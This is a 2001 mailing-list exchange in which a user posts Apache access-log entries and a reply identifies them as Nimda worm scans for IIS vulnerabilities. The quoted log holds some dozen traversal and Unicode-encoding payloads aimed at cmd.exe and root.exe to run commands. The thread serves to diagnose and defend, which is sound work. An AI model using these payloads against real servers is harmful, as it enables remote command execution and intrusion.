tomcat-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Paul Foxton <p...@network-sol.com>
Subject RE: Apache access.log - (whats going on)
Date Wed, 10 Oct 2001 09:59:02 GMT
Thats the nimda worm looking for IIS vulnerabilities.

> -----Original Message-----
> From: Lars Nielsen Lind [mailto:moonie@worldonline.dk]
> Sent: 10 October 2001 07:20
> To: tomcat-user@jakarta.apache.org
> Subject: Apache access.log - (whats going on)
> 
> 
> Hi.
> 
> I have read my access.log (apache) and found several IP's as 
> shown below. Whats going on?
> 
> /Lars Nielsen Lind
>  
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET 
> /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET 
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET 
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET 
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 309 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> ?/c+dir HTTP/1.0" 404 326 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
> ?/c+dir HTTP/1.0" 404 326 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1
> %1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 308 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 308 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 308 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET 
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 308 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET 
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 400 292 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET 
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 400 292 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET 
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir 
> HTTP/1.0" 404 309 "-" "-"
> 
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET 
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 
> 404 309 "-" "-"
> 
> 

Mime
View raw message